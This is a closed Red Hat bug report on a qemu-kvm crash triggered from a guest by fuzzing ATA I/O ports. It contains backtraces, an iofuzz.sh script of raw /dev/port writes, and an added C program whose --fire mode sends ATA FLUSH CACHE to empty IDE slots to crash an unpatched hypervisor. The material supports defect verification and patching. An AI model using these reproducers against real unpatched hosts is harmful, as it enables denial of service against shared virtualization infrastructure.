Bug 1140145 - qemu-kvm crashed when doing iofuzz testing
Summary: qemu-kvm crashed when doing iofuzz testing
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Enterprise Linux 7
Classification: Red Hat
Component: qemu-kvm-rhev
Version: 7.0
Hardware: Unspecified
OS: Unspecified
high
unspecified
Target Milestone: rc
Assignee: Kevin Wolf
QA Contact: Virtualization Bugs
URL:
Whiteboard:
Depends On:
Blocks:
 
Reported: 2014-09-10 11:20 UTC by Kevin Wolf
Modified: 2015-03-05 09:55 UTC (History)

Fixed In Version: qemu-kvm-rhev-2.1.0-4.el7
Doc Type: Bug Fix
Doc Text:
Clone Of: 1123372
Environment:
Last Closed: 2015-03-05 09:55:00 UTC




Links
System: Red Hat Product Errata
ID: RHSA-2015:0624
Priority: normal
Status: SHIPPED_LIVE
Summary: Important: qemu-kvm-rhev security, bug fix, and enhancement update
Last Updated: 2015-03-05 14:37:36 UTC

Comment 1 Miroslav Rezanina 2014-09-17 07:38:13 UTC
Fix included in qemu-kvm-rhev-2.1.0-4.el7

Comment 3 Qian Guo 2014-10-20 07:30:37 UTC
Reproduced this bug with qemu-kvm-rhev-2.1.0-3.el7.x86_64.

Steps:
1. Boot guest:
/usr/libexec/qemu-kvm \
    -S  \
    -name 'virt-tests-vm1'  \
    -sandbox off  \
    -M pc  \
    -nodefaults  \
    -vga cirrus  \
    -chardev socket,id=qmp_id_qmpmonitor1,path=/tmp/monitor-qmpmonitor1-20141020-144555-MBmqGjFJ,server,nowait \
    -mon chardev=qmp_id_qmpmonitor1,mode=control  \
    -chardev socket,id=serial_id_serial0,path=/tmp/serial-serial0-20141020-144555-MBmqGjFJ,server,nowait \
    -device isa-serial,chardev=serial_id_serial0  \
    -chardev socket,id=seabioslog_id_20141020-144555-MBmqGjFJ,path=/tmp/seabios-20141020-144555-MBmqGjFJ,server,nowait \
    -device isa-debugcon,chardev=seabioslog_id_20141020-144555-MBmqGjFJ,iobase=0x402 \
    -device ich9-usb-uhci1,id=usb1,bus=pci.0,addr=03 \
    -drive id=drive_image1,if=none,cache=none,snapshot=off,aio=native,file=/root/staf-kvm-devel/autotest-devel/client/tests/virt/shared/data/images/rhel70-64-virtio.qcow2 \
    -device virtio-blk-pci,id=image1,drive=drive_image1,bootindex=0,bus=pci.0,addr=04 \
    -device virtio-net-pci,mac=9a:8d:8e:8f:90:91,id=id4sZgOo,vectors=4,netdev=idCltxru,bus=pci.0,addr=05  \
    -netdev tap,id=idCltxru,vhost=on,vhostfd=23,fd=22  \
    -m 4096  \
    -smp 1,cores=1,threads=1,sockets=1  \
    -cpu 'Opteron_G2',+kvm_pv_unhalt \
    -device usb-tablet,id=usb-tablet1,bus=usb1.0,port=1  \
    -vnc :0  \
    -rtc base=utc,clock=host,driftfix=slew  \
    -boot order=cdn,once=c,menu=off  \
    -no-kvm-pit-reinjection \
    -enable-kvm


2. Check the ioports and confirm the ata_piix ranges:
# cat /proc/ioports
0000-0cf7 : PCI Bus 0000:00
  0000-001f : dma1
  0020-0021 : pic1
  0040-0043 : timer0
  0050-0053 : timer1
  0060-0060 : keyboard
  0064-0064 : keyboard
  0070-0071 : rtc0
  0080-008f : dma page reg
  00a0-00a1 : pic2
  00c0-00df : dma2
  00f0-00ff : fpu
  0170-0177 : 0000:00:01.1
    0170-0177 : ata_piix
  01f0-01f7 : 0000:00:01.1
    01f0-01f7 : ata_piix
  0376-0376 : 0000:00:01.1
    0376-0376 : ata_piix
  03c0-03df : vga+
  03f2-03f2 : floppy
  03f4-03f5 : floppy
  03f6-03f6 : 0000:00:01.1
    03f6-03f6 : ata_piix
  03f7-03f7 : floppy
  03f8-03ff : serial
  0600-063f : 0000:00:01.3
    0600-0603 : ACPI PM1a_EVT_BLK
    0604-0605 : ACPI PM1a_CNT_BLK
    0608-060b : ACPI PM_TMR
  0700-070f : 0000:00:01.3
    0700-0707 : piix4_smbus
0cf8-0cff : PCI conf1
0d00-adff : PCI Bus 0000:00
ae0f-aeff : PCI Bus 0000:00
af20-afdf : PCI Bus 0000:00
afe0-afe3 : ACPI GPE0_BLK
afe4-ffff : PCI Bus 0000:00
  c000-c03f : 0000:00:04.0
    c000-c03f : virtio-pci
  c040-c05f : 0000:00:03.0
    c040-c05f : uhci_hcd
  c060-c07f : 0000:00:05.0
    c060-c07f : virtio-pci
  c080-c08f : 0000:00:01.1
    c080-c08f : ata_piix


3. Do iofuzz on the ata_piix ioports.

Results:
qemu crashed:
(gdb) bt
#0  0x00007f6ea4fd097a in bdrv_acct_done (bs=0x0, cookie=cookie@entry=0x7f6ea7430f48) at block.c:5536
#1  0x00007f6ea4f44f7b in ide_flush_cb (opaque=0x7f6ea7430c80, ret=<optimized out>) at hw/ide/core.c:841
#2  0x00007f6ea4f45333 in ide_flush_cache (s=<optimized out>) at hw/ide/core.c:850
#3  0x00007f6ea4f45559 in cmd_flush_cache (s=<optimized out>, cmd=<optimized out>) at hw/ide/core.c:1226
#4  0x00007f6ea4f45609 in ide_exec_cmd (bus=<optimized out>, val=<optimized out>) at hw/ide/core.c:1758
#5  0x00007f6ea4dee3da in access_with_adjusted_size (addr=addr@entry=7, value=value@entry=0x7f6e977b0af0, size=size@entry=1, 
    access_size_min=<optimized out>, access_size_max=<optimized out>, access=0x7f6ea4dee550 <memory_region_write_accessor>, 
    mr=0x7f6ea743d680) at /usr/src/debug/qemu-2.1.0/memory.c:481
#6  0x00007f6ea4df2fa7 in memory_region_dispatch_write (size=1, data=234, addr=7, mr=0x7f6ea743d680)
    at /usr/src/debug/qemu-2.1.0/memory.c:1143
#7  io_mem_write (mr=mr@entry=0x7f6ea743d680, addr=7, val=<optimized out>, size=1) at /usr/src/debug/qemu-2.1.0/memory.c:1976
#8  0x00007f6ea4dbe343 in address_space_rw (as=0x7f6ea5445ce0 <address_space_io>, addr=addr@entry=375, 
    buf=0x7f6ea4ce3000 <Address 0x7f6ea4ce3000 out of bounds>, len=len@entry=1, is_write=is_write@entry=true)
    at /usr/src/debug/qemu-2.1.0/exec.c:2052
#9  0x00007f6ea4ded860 in kvm_handle_io (count=1, size=1, direction=<optimized out>, data=<optimized out>, port=375)
    at /usr/src/debug/qemu-2.1.0/kvm-all.c:1600
#10 kvm_cpu_exec (cpu=cpu@entry=0x7f6ea73aa400) at /usr/src/debug/qemu-2.1.0/kvm-all.c:1737
#11 0x00007f6ea4ddca02 in qemu_kvm_cpu_thread_fn (arg=0x7f6ea73aa400) at /usr/src/debug/qemu-2.1.0/cpus.c:874
#12 0x00007f6ea3892df3 in start_thread () from /usr/lib64/libpthread.so.0
#13 0x00007f6e9ee7c3dd in clone () from /usr/lib64/libc.so.6
(gdb) bt full
#0  0x00007f6ea4fd097a in bdrv_acct_done (bs=0x0, cookie=cookie@entry=0x7f6ea7430f48) at block.c:5536
        __PRETTY_FUNCTION__ = "bdrv_acct_done"
#1  0x00007f6ea4f44f7b in ide_flush_cb (opaque=0x7f6ea7430c80, ret=<optimized out>) at hw/ide/core.c:841
        s = 0x7f6ea7430c80
#2  0x00007f6ea4f45333 in ide_flush_cache (s=<optimized out>) at hw/ide/core.c:850
No locals.
#3  0x00007f6ea4f45559 in cmd_flush_cache (s=<optimized out>, cmd=<optimized out>) at hw/ide/core.c:1226
No locals.
#4  0x00007f6ea4f45609 in ide_exec_cmd (bus=<optimized out>, val=<optimized out>) at hw/ide/core.c:1758
        s = 0x7f6ea7430c80
        complete = <optimized out>
        __PRETTY_FUNCTION__ = "ide_exec_cmd"
#5  0x00007f6ea4dee3da in access_with_adjusted_size (addr=addr@entry=7, value=value@entry=0x7f6e977b0af0, size=size@entry=1, 
    access_size_min=<optimized out>, access_size_max=<optimized out>, access=0x7f6ea4dee550 <memory_region_write_accessor>, 
    mr=0x7f6ea743d680) at /usr/src/debug/qemu-2.1.0/memory.c:481
        access_mask = 255
        access_size = 1
        i = <optimized out>
#6  0x00007f6ea4df2fa7 in memory_region_dispatch_write (size=1, data=234, addr=7, mr=0x7f6ea743d680)
    at /usr/src/debug/qemu-2.1.0/memory.c:1143
No locals.
#7  io_mem_write (mr=mr@entry=0x7f6ea743d680, addr=7, val=<optimized out>, size=1) at /usr/src/debug/qemu-2.1.0/memory.c:1976
No locals.
#8  0x00007f6ea4dbe343 in address_space_rw (as=0x7f6ea5445ce0 <address_space_io>, addr=addr@entry=375, 
    buf=0x7f6ea4ce3000 <Address 0x7f6ea4ce3000 out of bounds>, len=len@entry=1, is_write=is_write@entry=true)
    at /usr/src/debug/qemu-2.1.0/exec.c:2052
        l = 1
        ptr = <optimized out>
        val = 234
        addr1 = 7
        mr = 0x7f6ea743d680
        error = false
#9  0x00007f6ea4ded860 in kvm_handle_io (count=1, size=1, direction=<optimized out>, data=<optimized out>, port=375)
    at /usr/src/debug/qemu-2.1.0/kvm-all.c:1600
        i = 0
        ptr = <optimized out>
#10 kvm_cpu_exec (cpu=cpu@entry=0x7f6ea73aa400) at /usr/src/debug/qemu-2.1.0/kvm-all.c:1737
        run = 0x7f6ea4ce2000
        ret = <optimized out>
        run_ret = <optimized out>
#11 0x00007f6ea4ddca02 in qemu_kvm_cpu_thread_fn (arg=0x7f6ea73aa400) at /usr/src/debug/qemu-2.1.0/cpus.c:874
        cpu = 0x7f6ea73aa400
        r = <optimized out>
#12 0x00007f6ea3892df3 in start_thread () from /usr/lib64/libpthread.so.0
No symbol table info available.
#13 0x00007f6e9ee7c3dd in clone () from /usr/lib64/libc.so.6
No symbol table info available.



So this bug is reproduced.

Comment 4 Qian Guo 2014-10-20 09:40:42 UTC
Verified this bug with qemu-kvm-rhev-2.1.2-3.el7.x86_64.

Steps:
1. Boot guest:
/usr/libexec/qemu-kvm -name 'virt-tests-vm1' -sandbox off -M pc -nodefaults -vga cirrus -chardev socket,id=qmp_id_qmpmonitor1,path=/tmp/monitor-qmpmonitor1-20141020-144555-MBmqGjFJ,server,nowait -mon chardev=qmp_id_qmpmonitor1,mode=control -chardev socket,id=serial_id_serial0,path=/tmp/serial-serial0-20141020-144555-MBmqGjFJ,server,nowait -device isa-serial,chardev=serial_id_serial0 -chardev socket,id=seabioslog_id_20141020-144555-MBmqGjFJ,path=/tmp/seabios-20141020-144555-MBmqGjFJ,server,nowait -device isa-debugcon,chardev=seabioslog_id_20141020-144555-MBmqGjFJ,iobase=0x402 -device ich9-usb-uhci1,id=usb1,bus=pci.0,addr=03 -drive id=drive_image1,if=none,cache=none,snapshot=off,aio=native,file=/root/staf-kvm-devel/autotest-devel/client/tests/virt/shared/data/images/rhel70-64-virtio.qcow2 -device virtio-blk-pci,id=image1,drive=drive_image1,bootindex=0,bus=pci.0,addr=04 -device virtio-net-pci,mac=9a:8d:8e:8f:90:91,id=id4sZgOo,vectors=4,netdev=idCltxru,bus=pci.0,addr=05 -netdev tap,id=idCltxru,vhost=on,script=/etc/qemu-ifup -m 4096 -smp 1,cores=1,threads=1,sockets=1 -cpu 'Opteron_G2',+kvm_pv_unhalt -device usb-tablet,id=usb-tablet1,bus=usb1.0,port=1 -vnc :0 -rtc base=utc,clock=host,driftfix=slew -boot order=cdn,once=c,menu=off -no-kvm-pit-reinjection -enable-kvm -monitor stdio

2. In the guest, do iofuzz on "ata_piix" (which can hit the crash as reproduced above):
# cat iofuzz.sh
# Ports 368-375 are 0x170-0x177, the secondary IDE channel task file listed
# under ata_piix above; 0x177 is the command register on write and the
# status register on read. Needs root: /dev/port maps raw I/O port space.
# Reads: skip= positions the input (/dev/port); seek= would position the output.
dd if=/dev/port skip=368 of=/dev/null bs=1 count=1
dd if=/dev/port skip=369 of=/dev/null bs=1 count=1
dd if=/dev/port skip=370 of=/dev/null bs=1 count=1
dd if=/dev/port skip=371 of=/dev/null bs=1 count=1
dd if=/dev/port skip=372 of=/dev/null bs=1 count=1
dd if=/dev/port skip=373 of=/dev/null bs=1 count=1
dd if=/dev/port skip=374 of=/dev/null bs=1 count=1
dd if=/dev/port skip=375 of=/dev/null bs=1 count=1
# Writes: echo -e '\0nnn' emits the byte with octal value nnn plus a newline,
# and count=1 sends only that first byte to the port selected by seek=.
echo -e '\0' | dd of=/dev/port seek=368 bs=1 count=1
echo -e '\0' | dd of=/dev/port seek=369 bs=1 count=1
echo -e '\0' | dd of=/dev/port seek=370 bs=1 count=1
echo -e '\0' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\0' | dd of=/dev/port seek=372 bs=1 count=1
echo -e '\0' | dd of=/dev/port seek=373 bs=1 count=1
echo -e '\0' | dd of=/dev/port seek=374 bs=1 count=1
echo -e '\0' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\0102' | dd of=/dev/port seek=370 bs=1 count=1
echo -e '\0372' | dd of=/dev/port seek=368 bs=1 count=1
echo -e '\060' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\034' | dd of=/dev/port seek=372 bs=1 count=1
echo -e '\026' | dd of=/dev/port seek=369 bs=1 count=1
echo -e '\063' | dd of=/dev/port seek=372 bs=1 count=1
echo -e '\041' | dd of=/dev/port seek=374 bs=1 count=1
echo -e '\0365' | dd of=/dev/port seek=372 bs=1 count=1
echo -e '\06' | dd of=/dev/port seek=372 bs=1 count=1
echo -e '\0106' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\0156' | dd of=/dev/port seek=374 bs=1 count=1
echo -e '\01' | dd of=/dev/port seek=370 bs=1 count=1
echo -e '\0317' | dd of=/dev/port seek=369 bs=1 count=1
echo -e '\023' | dd of=/dev/port seek=374 bs=1 count=1
echo -e '\053' | dd of=/dev/port seek=374 bs=1 count=1
echo -e '\0153' | dd of=/dev/port seek=370 bs=1 count=1
echo -e '\05' | dd of=/dev/port seek=369 bs=1 count=1
echo -e '\0233' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\0250' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\0140' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\0150' | dd of=/dev/port seek=373 bs=1 count=1
echo -e '\0334' | dd of=/dev/port seek=374 bs=1 count=1
echo -e '\0360' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\0372' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\0202' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\0160' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\0316' | dd of=/dev/port seek=368 bs=1 count=1
echo -e '\043' | dd of=/dev/port seek=370 bs=1 count=1
echo -e '\0121' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\0153' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\071' | dd of=/dev/port seek=369 bs=1 count=1
echo -e '\0153' | dd of=/dev/port seek=370 bs=1 count=1
echo -e '\0302' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\0275' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\0170' | dd of=/dev/port seek=372 bs=1 count=1
echo -e '\0302' | dd of=/dev/port seek=370 bs=1 count=1
echo -e '\0377' | dd of=/dev/port seek=369 bs=1 count=1
echo -e '\0310' | dd of=/dev/port seek=369 bs=1 count=1
echo -e '\0153' | dd of=/dev/port seek=372 bs=1 count=1
echo -e '\0101' | dd of=/dev/port seek=368 bs=1 count=1
echo -e '\056' | dd of=/dev/port seek=373 bs=1 count=1
echo -e '\0126' | dd of=/dev/port seek=374 bs=1 count=1
echo -e '\0124' | dd of=/dev/port seek=369 bs=1 count=1
echo -e '\0131' | dd of=/dev/port seek=370 bs=1 count=1
echo -e '\0272' | dd of=/dev/port seek=369 bs=1 count=1
echo -e '\03' | dd of=/dev/port seek=370 bs=1 count=1
echo -e '\017' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\0160' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\0117' | dd of=/dev/port seek=368 bs=1 count=1
echo -e '\0334' | dd of=/dev/port seek=369 bs=1 count=1
echo -e '\0353' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\072' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\0213' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\0351' | dd of=/dev/port seek=372 bs=1 count=1
echo -e '\0271' | dd of=/dev/port seek=373 bs=1 count=1
echo -e '\0210' | dd of=/dev/port seek=374 bs=1 count=1
echo -e '\0127' | dd of=/dev/port seek=375 bs=1 count=1
echo -e '\067' | dd of=/dev/port seek=371 bs=1 count=1
echo -e '\064' | dd of=/dev/port seek=374 bs=1 count=1
echo -e '\0251' | dd of=/dev/port seek=374 bs=1 count=1
# 0352 octal = 234 = 0xEA, ATA FLUSH CACHE, written to 0x177: this is the
# access in the backtrace above (port=375, data=234 -> cmd_flush_cache).
echo -e '\0352' | dd of=/dev/port seek=375 bs=1 count=1


# sh iofuzz.sh

Result: no crash, so this bug is fixed.
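
The following C program is an added example written for this page; it is not part of the bug report, of the autotest iofuzz tool, or of QEMU. It turns the two pieces of the reproducer above into one deterministic check: the /proc/ioports walk from step 2 of comment 3 (finding the 8-port ata_piix task files, 0x1F0 and 0x170 in the listing) and the byte iofuzz.sh ends with. The backtrace pins the crash to one access: a 1-byte write of 234 (0xEA, ATA FLUSH CACHE) to port 375 (0x177, the secondary channel's command register), dispatched through ide_exec_cmd to cmd_flush_cache and ide_flush_cb with bs=0x0, that is, a flush issued to an IDE slot that has no drive attached (this guest boots from virtio-blk with -nodefaults, so both IDE channels are empty). Everything else is assumption: the file name, the --fire flag, the use of ioperm()/outb() from <sys/io.h> (x86 Linux only, needs CAP_SYS_RAWIO, so root inside the guest), the standard legacy ATA register layout (device/head at base+6, command/status at base+7), and the constructed /proc/ioports excerpt embedded for the no-argument run.

```c
/* ata_flush_probe.c: added example, not part of this bug report or of QEMU.
 * Build on x86 Linux: gcc -O2 -Wall -o ata_flush_probe ata_flush_probe.c
 * No arguments: only parse a constructed /proc/ioports excerpt (safe anywhere).
 * --fire, as root INSIDE a disposable guest: send ATA FLUSH CACHE to every
 * ata_piix task file in the live /proc/ioports, the write the backtrace shows. */
#include <stdio.h>
#include <string.h>
#if defined(__linux__) && (defined(__x86_64__) || defined(__i386__))
#include <sys/io.h>                 /* ioperm(), inb(), outb() */
#define HAVE_X86_PORT_IO 1
#endif

#define ATA_TASKFILE_LEN    8       /* legacy task file: 8 ports from the channel base */
#define ATA_REG_DEVHEAD     6       /* drive/head select, bit 4 = slave */
#define ATA_REG_COMMAND     7       /* command on write, status on read */
#define ATA_CMD_FLUSH_CACHE 0xEA    /* 234, the data= value in frame #6 of the backtrace */

/* Decode a bash 'echo -e' escape of the form \0nnn (a zero, then up to three
 * octal digits), the spelling iofuzz.sh uses.  Returns -1 if malformed. */
int echo_octal_escape(const char *s)
{
    int val = 0, ndig = 0;
    if (s[0] != '\\' || s[1] != '0')
        return -1;
    for (const char *p = s + 2; *p >= '0' && *p <= '7' && ndig < 3; p++, ndig++)
        val = val * 8 + (*p - '0');
    return val & 0xFF;
}

/* Scan a /proc/ioports dump for the 8-port ranges claimed by `driver`, skipping
 * ata_piix's 1-port control and 16-port bus-master ranges.  Returns the count. */
int ata_taskfile_bases(const char *ioports, const char *driver, unsigned *bases, int max)
{
    int n = 0;
    for (const char *line = ioports; line && *line && n < max; ) {
        unsigned lo, hi;
        char name[32];
        if (sscanf(line, " %x-%x : %31s", &lo, &hi, name) == 3 &&
            strcmp(name, driver) == 0 && hi - lo + 1 == ATA_TASKFILE_LEN)
            bases[n++] = lo;
        if ((line = strchr(line, '\n')) != NULL)
            line++;                 /* next line, or NULL at end of dump */
    }
    return n;
}

/* The idx-th task-file base for `driver`, or 0 if there is none. */
unsigned ata_taskfile_base_at(const char *ioports, const char *driver, int idx)
{
    unsigned bases[8];
    int n = ata_taskfile_bases(ioports, driver, bases, 8);
    return (idx >= 0 && idx < n) ? bases[idx] : 0;
}

/* Select drive 0/1 on the channel at `base` and issue FLUSH CACHE.  Returns the
 * status byte, or -1 when raw port access is unavailable (no CAP_SYS_RAWIO, or
 * not x86 Linux).  An unfixed qemu-kvm dies inside the second outb(). */
int ata_flush_cache(unsigned base, int drive)
{
#ifdef HAVE_X86_PORT_IO
    if (ioperm(base, ATA_TASKFILE_LEN, 1) != 0)
        return -1;
    outb(0xA0 | ((drive & 1) << 4), base + ATA_REG_DEVHEAD);
    outb(ATA_CMD_FLUSH_CACHE, base + ATA_REG_COMMAND);  /* frame #8: port 0x177, value 0xEA */
    return inb(base + ATA_REG_COMMAND);
#else
    (void)base; (void)drive;
    return -1;
#endif
}

/* Constructed excerpt of the guest's /proc/ioports from the report above. */
const char sample_ioports[] =
    "  0170-0177 : 0000:00:01.1\n    0170-0177 : ata_piix\n"
    "  01f0-01f7 : 0000:00:01.1\n    01f0-01f7 : ata_piix\n"
    "  c080-c08f : 0000:00:01.1\n    c080-c08f : ata_piix\n";
int main(int argc, char **argv)
{
    static char live[1 << 16];
    unsigned bases[4];
    const char *src = sample_ioports;
    int fire = argc > 1 && strcmp(argv[1], "--fire") == 0;
    if (fire) {                                   /* read the guest's live table */
        FILE *f = fopen("/proc/ioports", "r");
        size_t len = f ? fread(live, 1, sizeof live - 1, f) : 0;
        if (f) fclose(f);
        live[len] = '\0';
        src = live;
    }
    printf("iofuzz.sh's last write, echo -e '\\0352', sends 0x%02x\n", echo_octal_escape("\\0352"));
    int n = ata_taskfile_bases(src, "ata_piix", bases, 4);
    for (int i = 0; i < n; i++) {
        printf("ATA task file at 0x%03x, command register 0x%03x\n", bases[i], bases[i] + ATA_REG_COMMAND);
        if (!fire) continue;
        int st = ata_flush_cache(bases[i], 0);
        if (st < 0) { perror("ata_flush_cache"); return 1; }
        printf("  status 0x%02x after FLUSH CACHE: the hypervisor survived\n", st);
    }
    return 0;
}
```

Used as a before/after check for the update this bug ships in: on the affected build the guest's qemu-kvm process is gone after `./ata_flush_probe --fire` (the host shows the bdrv_acct_done trace above); on qemu-kvm-rhev-2.1.0-4.el7 or later the program prints a status byte for each channel and the guest keeps running. The ata_piix lines only appear if the guest kernel bound that driver, as it did in the listing; otherwise pass the bases 0x1F0 and 0x170 directly. Run it only in a throwaway guest: the command is harmless to an attached disk (a flush), but the whole point is that the empty slot is what crashes the hypervisor.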

Comment 6 errata-xmlrpc 2015-03-05 09:55:00 UTC
Since the problem described in this bug report should be
resolved in a recent advisory, it has been closed with a
resolution of ERRATA.

For information on the advisory, and where to find the updated
files, follow the link below.

If the solution does not work for you, open a new bug report.

https://rhn.redhat.com/errata/RHSA-2015-0624.html

